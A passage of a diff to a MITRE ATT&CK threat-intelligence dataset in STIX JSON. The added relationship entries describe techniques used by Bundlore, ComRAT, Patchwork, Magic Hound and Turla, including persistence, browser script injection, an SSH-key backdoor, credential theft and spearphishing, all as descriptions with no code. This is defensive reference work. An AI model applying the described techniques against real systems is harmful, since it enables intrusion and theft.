+ "id": "relationship--68cfc5f9-3c65-4f24-8018-cf811d7b6c9f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.360Z",
+ "created": "2020-07-01T21:05:18.856Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d70ae3e8-39e2-4835-9ba6-56dee8d028fc",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.396Z",
+ "created": "2020-07-01T21:05:18.864Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--885c54e7-6b1c-4399-a051-1e0b047d6f92",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.393Z",
+ "created": "2020-07-01T21:05:18.859Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--72df7e88-84ce-449b-ae0f-a8ceb9316964",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.400Z",
+ "created": "2020-07-01T21:05:18.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--cb53d2b5-6606-4597-b5e9-d9c114e2607e",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.395Z",
+ "created": "2020-07-01T21:05:18.901Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a9f9bef5-31f0-44bf-bba5-4c13a5eda5ac",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.406Z",
+ "created": "2020-07-01T21:05:18.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6723c87e-f60a-465f-96cd-78d63d17ba01",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.399Z",
+ "created": "2020-07-01T21:19:30.513Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--677878af-62d4-4407-bbe6-551b7906a366",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.403Z",
+ "created": "2020-07-01T21:19:30.521Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fbbaf901-4d1a-41e0-9040-78185113ffdf",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.398Z",
+ "created": "2020-07-01T21:19:30.577Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--132c7780-3fa4-478b-b037-f2c1ad99d98f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.405Z",
+ "created": "2020-07-01T21:19:30.582Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91038a74-575b-4f2e-9dba-767b50b8e4ab",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.402Z",
+ "created": "2020-07-01T21:19:30.586Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries",
+ "description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
+ "source_name": "Symantec Patchwork"
+ },
+ {
+ "source_name": "TrendMicro Patchwork Dec 2017",
+ "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
+ },
+ {
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
+ "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to try to get users to click, download and open malicious files.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--67154159-cd44-4d9c-ae84-c82a8cd5ee58",
+ "type": "relationship",
+ "modified": "2020-07-03T22:15:24.515Z",
+ "created": "2020-07-03T22:15:24.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--92d5b3fd-3b39-438e-af68-770e447beada",
+ "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
+ "external_references": [
+ {
+ "source_name": "ClearSky Charming Kitten Dec 2017",
+ "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ }
+ ],
+ "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--b49fa23f-285c-4a8d-81c6-995747e4a84b",
+ "type": "relationship",
+ "modified": "2020-07-04T22:20:47.110Z",
+ "created": "2020-07-04T22:20:47.110Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has used personalized spearphishing attachments.(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--656f97ff-d577-4c1b-af7a-02497fcadddb",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.416Z",
+ "created": "2020-07-04T22:55:43.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used FireMalv, custom-developed malware, which collected passwords from the Firefox browser storage.(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--6b901fc7-8aae-414b-96f2-2b626356cf38",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.422Z",
+ "created": "2020-07-04T22:55:43.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--44a71143-9a40-4307-8b8c-8b1ac0cf230d",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.581Z",
+ "created": "2020-07-04T22:55:43.581Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
+ "external_references": [
+ {
+ "source_name": "Check Point Rocket Kitten",
+ "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
+ "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
+ }
+ ],
+ "description": "(Citation: Check Point Rocket Kitten)",
+ "relationship_type": "uses",
+ "id": "relationship--de3436a3-b33f-4b47-a3c7-8204a67b4123",
+ "type": "relationship",
+ "modified": "2020-07-04T22:55:43.585Z",
+ "created": "2020-07-04T22:55:43.585Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "FireEye Operation Saffron Rose 2013",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf",
+ "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) has lured victims into executing malicious files.(Citation: FireEye Operation Saffron Rose 2013)",
+ "relationship_type": "uses",
+ "id": "relationship--ef5ae5a4-69ed-4ca1-b1b7-6cb854b49550",
+ "type": "relationship",
+ "modified": "2020-07-04T23:30:04.875Z",
+ "created": "2020-07-04T23:30:04.875Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "external_references": [
+ {
+ "source_name": "FireEye Operation Saffron Rose 2013",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf",
+ "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020."
+ },
+ {
+ "source_name": "SecureWorks Mia Ash July 2017",
+ "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
+ "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
+ },
+ {
+ "source_name": "Microsoft Phosphorus Mar 2019",
+ "url": "https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/",
+ "description": "Burt, T.. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels to spearphish victims.(Citation: FireEye Operation Saffron Rose 2013)(Citation: SecureWorks Mia Ash July 2017)(Citation: Microsoft Phosphorus Mar 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d432f9c7-1211-4485-bac3-b35edc38d501",
+ "type": "relationship",
+ "modified": "2020-07-04T23:30:04.892Z",
+ "created": "2020-07-04T23:30:04.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b7366815-256b-4e67-839a-1eb9aba03721",
+ "type": "relationship",
+ "modified": "2020-07-06T15:18:53.628Z",
+ "created": "2020-07-06T14:32:44.058Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--55465e2f-104a-440e-aa6b-24f1476fc86d",
+ "type": "relationship",
+ "modified": "2020-07-06T14:40:26.106Z",
+ "created": "2020-07-06T14:40:26.106Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has obtained information on security software, including security logging information that may indicate whether their malware has been detected.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ad8d3784-2eea-47b4-b13d-d16d0211acf3",
+ "type": "relationship",
+ "modified": "2020-07-06T14:49:46.322Z",
+ "created": "2020-07-06T14:49:46.322Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
+ "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4",
+ "relationship_type": "revoked-by",
+ "id": "relationship--c93632b4-0a7a-4492-a0e2-d57cffe7ff64",
+ "type": "relationship",
+ "modified": "2020-07-07T16:44:26.688Z",
+ "created": "2020-07-07T16:44:26.688Z"
+ },
{
"id": "course-of-action--4f170666-7edb-4489-85c2-9affa28a72e0",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -177129,8 +204965,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:02:53.251Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c61fee9f-16fb-4f8c-bbf0-869093fcd4a6",
@@ -177160,8 +204996,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:29:27.367Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c085476e-1964-4d7f-86e1-d8657a7741e8",
@@ -177216,8 +205052,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.252Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"object_marking_refs": [
@@ -177267,13 +205103,14 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:22.989Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_deprecated": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_deprecated": true
},
{
- "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
- "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
- "name": "Account Use Policies",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -177281,10 +205118,9 @@
"url": "https://attack.mitre.org/mitigations/M1036"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Account Use Policies",
+ "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
+ "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c",
"type": "course-of-action",
"modified": "2019-06-13T16:07:21.233Z",
"created": "2019-06-11T16:32:21.854Z",
@@ -177306,7 +205142,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "course-of-action",
- "modified": "2020-03-31T13:06:23.567Z",
+ "modified": "2020-05-29T16:34:40.344Z",
"created": "2019-06-06T16:39:58.291Z",
"x_mitre_version": "1.1"
},
@@ -177363,8 +205199,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.701Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--10571bf2-8073-4edf-a71c-23bad225532e",
@@ -177399,8 +205235,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.250Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--1e4ef2c7-ee96-4484-9baa-3b5777561301",
@@ -177425,8 +205261,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:31:55.409Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--c88151a5-fe3f-4773-8147-d801587065a4",
@@ -177446,8 +205282,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:05:33.227Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1",
@@ -177508,8 +205344,8 @@
"type": "course-of-action",
"modified": "2019-07-24T14:32:52.325Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b",
@@ -177554,8 +205390,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.664Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
"id": "course-of-action--16dd03c6-0dfb-4d77-89cd-9ff3ee6e533d",
@@ -177600,8 +205436,8 @@
"type": "course-of-action",
"modified": "2020-01-17T16:45:23.317Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.0",
- "x_mitre_deprecated": true
+ "x_mitre_deprecated": true,
+ "x_mitre_version": "1.0"
},
{
